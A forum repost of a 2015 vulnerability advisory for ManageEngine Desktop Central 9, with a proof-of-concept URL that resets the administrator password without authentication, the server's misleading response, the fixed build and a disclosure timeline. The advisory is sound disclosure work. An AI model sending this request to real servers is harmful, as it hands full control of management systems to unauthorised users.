KhiZaRix Posted March 28, 2015 Report Posted March 28, 2015 A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well.The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin).The following proof of concept URL changes the ‘admin’ user password to ‘admin3’. http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials:<operation><operationstatus>Failure</operationstatus><message>Problem while modifying user admin in DC.</message></operation>Complete control of the application can now be obtained by an unauthorised user.Vulnerability remediation:This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions.Vendor advisory:https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.htmlDisclosure timeline:Vendor notification: 02/02/2015Follow up with Vendor: 16/02/2015Fixed released: 18/02/2015CVE requested: 06/03/2015CVE assigned: 20/03/2015Vendor notification: 24/03/2015Public disclosure: 27/03/2015Source: http://dl.packetstormsecurity.net/1503-exploits/medc-escalate.txt Quote